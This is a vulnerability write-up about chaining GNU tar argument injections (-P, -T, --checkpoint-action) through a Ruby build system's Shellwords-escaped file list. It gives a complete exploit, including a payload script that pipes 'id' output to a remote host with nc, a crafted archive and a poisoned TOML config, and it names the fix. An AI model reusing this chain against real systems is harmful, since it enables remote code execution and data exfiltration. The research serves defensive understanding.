This is going to be a short write-up about an interesting argument injection I ran into a while ago. There is nothing new here, but it is still worth looking at as argument injection is an oft overlooked attack avenue as everyone is going after the more traditional command injection vulnerabilities.

What is argument injection?

Very similar to command injection, argument injection occurs when attacker controlled values/text are passed into a shell function without adequate sanitization. This type of vulnerability is normally a little harder to exploit than command injection as it typically requires that the command, who’s arguments are being injected into, has one or more arguments that lead to a code path for command execution. In command injection shell control characters are used to “escape” the current command, or to inject additional commands, these as we know are [;`"'|&${}]. With argument injection the attacker controlled value needs to start with - or -- (not always but this is the most common form). Another form is wildcard injection, which leads to argument injection. The best known example of this is for the tar command, where the * wildcard is used to trick tar into reading filenames as arguments:

Some recent examples of argument injection to code execution:

The vulnerability

While looking at a system that processed user supplied files, I noticed some code that shells out to an external command. The system would first clone a git repository (or download an archive), check if the downloaded folder contained a specific file, which if it existed, contained a list of additional external files to download. This file looked similar to this:

name = "mybuilder"

  url = "http://remoteserver/tark.tar"
  dir = "."
  files = ["file1","file2","file3"]
  url = "http://remoteserver/tark.tar"
  dir = "."
  files = []

As can be seen, one or more external archive locations can be included. The option also exists to specify that only certain files from those archives should be extracted.

The code routine which did this extraction was written in Ruby and resembled this

command = "tar  -C \"#{Shellwords.escape destination}\" -xvzf \"#{Shellwords.escape tgzfile}\" "

extractFiles.each do |f|
  command << " \"#{Shellwords.escape f}\""

Here is a modified version that takes the arguments from the command-line, so it makes local testing easier:

require 'shellwords'

destination =  ARGV[0]
tgzfile =  ARGV[1]

command = "tar  -C \"#{Shellwords.escape destination}\" -xvzf \"#{Shellwords.escape tgzfile}\" "

ARGV[2..-1].each do |f|
  command << " \"#{Shellwords.escape f}\""
puts command

out = `#{command} 2>&1`

unless $?.success?
      error = "Error running a shell command\n"
      error << "$ #{command}\n"
      error << out

      raise error
puts out

In this case the vulnerability happened to be in the a code routine that shells out to tar, however unlike the above mentioned example, wildcards didn’t work. This is because the developers took into account the possibility of command injection and used the Ruby Shellwords module to escape the user supplied values. If you look at the source code for this module, you will note that almost all characters are automatically escaped when Shellwords.escape or shellescape are used, this is controlled with the str.gsub, which defines any character that is not [^A-Za-z0-9_\-.,:\/@\n] should be escaped. This includes the * and other wildcards.

 # File shellwords.rb, line 138
def shellescape(str)
  str = str.to_s

  # An empty argument will be skipped, so return empty quotes.
  return "''".dup if str.empty?

  str = str.dup

  # Treat multibyte characters as is.  It is the caller's responsibility
  # to encode the string in the right encoding for the shell
  # environment.
  str.gsub!(/([^A-Za-z0-9_\-.,:\/@\n])/, "\\\\\\1")

  # A LF cannot be escaped with a backslash because a backslash + LF
  # combo is regarded as a line continuation and simply ignored.
  str.gsub!(/\n/, "'\n'")

  return str

The one character that is not escaped, which allows us to gain argument injection is the -. At this point it seems that the exploit path is actually pretty straight forward. Instead of using the * from the tar injection via wildcards example, we can just supply the arguments directly as --checkpoint=1 and --checkpoint-action=ACTION. Unfortunately this doesn’t work, as the = is also escaped by shellwords.

This means we need to find another argument or set of arguments which lead to a code path for command execution.

The exploit

The first step in figuring this out is to read the GNU Tar manual; There are actually multiple arguments that can be used, these are;

For injection into the extract command:

  • --to-command <command>
  • --checkpoint=1 --checkpoint-action=exec=<command>
  • -T <file> or --files-from <file>, where contains one of the previous injections

For injection into the create command:

  • -I=<program> or -I <program>
  • --use-compres-program=<program>

These short options also work without spaces, which can be beneficial in other cases

  • -T<file>
  • -I"/path/to/exec"

For the exploit, the extract command is being used so one of the identified injection points for there should be used. We also know that the = can’t be present, so that leaves --to-command, -T and --files-from as possible argument injections.

The snag

The option to inject arguments exists, it is possible to inject arguments that aren’t escaped in any way (no =), however, the --to-command and -T or --files-from commands all require a filepath that is under attacker control. This is because we need to be able to drop the executable file there, for the --to-command or the file-list with the additional arguments for use with -T. The extraction code doesn’t allow us to control the destination though, a temporary folder is created for each extraction operation. The challenge was to get around this to allow us to drop a file in a file path we know and control.

Fortunately we can use argument injection for this! Going through the GNU Tar manual, there is an argument that sticks out --absolute-names or -P. Tar usually strips leading slashes and directory traversals from files in the archive. When using absolute-names, tar will use the full path in the archive as the file path to extract to. Thus if a file has a name of /tmp/myfile tar will extract it to /tmp/myfile instead of /<extract-destination>/tmp/myfile.

Building the exploit

Now with the snag taken care of, a full exploit chain can be put together. The command execution file is created:

cat > /tmp/p <<EOF
# insert your bad command here
id | nc remoteserver 443
chmod +x /tmp/p

Then the argument injection file to call the exploit:

cat > /tmp/xx <<EOF
--checkpoint-action="exec=sh /tmp/p"

These are put into an archive:

tar cvzf blah.tgz -P /tmp/p /tmp/xx

tar tvf blah.tgz 
tar: Removing leading `/' from member names
-rw-r--r-- staaldraad/staaldraad 0 2019-11-24 13:36 /tmp/p
-rw-r--r-- staaldraad/staaldraad 0 2019-11-24 13:36 /tmp/xx

The archive is hosted remotely and the build file is updated to download this file, and some argument injection is added:

name = "mybuilder"

  url = "http://remoteserver/blah.tgz"
  dir = "."
  files = ["-P"]
  url = "http://remoteserver/blah.tgz"
  dir = "."
  files = ["-P","-T","/tmp/xx"]

When the buildfiles.toml is parsed, the blah.tgz is downloaded and extracted. Because the files parameter is polluted with -P tar options, this will be passed as a command-line argument to tar. This will result in the contents being extract to /tmp/xx and /tmp/p respectively, ensuring we have full control of those file paths, which is required for the next step.

The second externalPacks directive is parsed and the tar file is downloaded again, this time the values -T and /tmp/xx will be passed to tar. Even though these are separate arguments, tar will parse them together, since -T expects an argument. This will then cause tar to read the file at /tmp/xx and inject the filenames there into the command-line. These will then be parsed as arguments, --checkpoint=1 and --checkpoint-action respectively. Checkpoints will cause a command to be executed everytime the checkpoint is hit, in this case the script at /tmp/p.

The two argument injections we get look like this:

tar -C "destination" -xvzf "blah.tgz" -P


tar -C "destination" -xvzf "blah.tgz" -P -T /tmp/xx

and finally the above gets “updated” by tar to give us the effective commandline of

tar -C "destination" -xvzf "blah.tgz" -P -T /tmp/xx --checkpoint=1 --checkpoint-action=/tmp/p

A nice chain of argument injections leading to command execution. The --to-command could also have been used, but because of the space in the argument, --to-command "/path", the injection fails as the space is escaped by shellwords. When going through the -T route, the final command is generated by tar after the shellwords.escape has happened and no characters are escaped.


In the end the original code was trying to do the right thing by escaping user supplied data, unfortunately the escaping didn’t cover the - since this isn’t typically seen as an injection character (and is pretty common in file names). Fortunately tar provides a number of paths that can be used for gaining code execution, by chaining multiple argument injections together, it was possible to get command execution. The fix here was to add an additional check and discarding any user supplied filename that started with -. An alternative would be to use -- in the command, as most linux commands now support this for indicating that the values that follow should not be treated as arguments, for example

rm -- <user-path> <user-path2>

This will try remove the files -rf and / instead of treating it as the dreading rm -rf / injection.

Although there is nothing new in this work, it is a good reminder that argument injection should always be considered when evaluating code.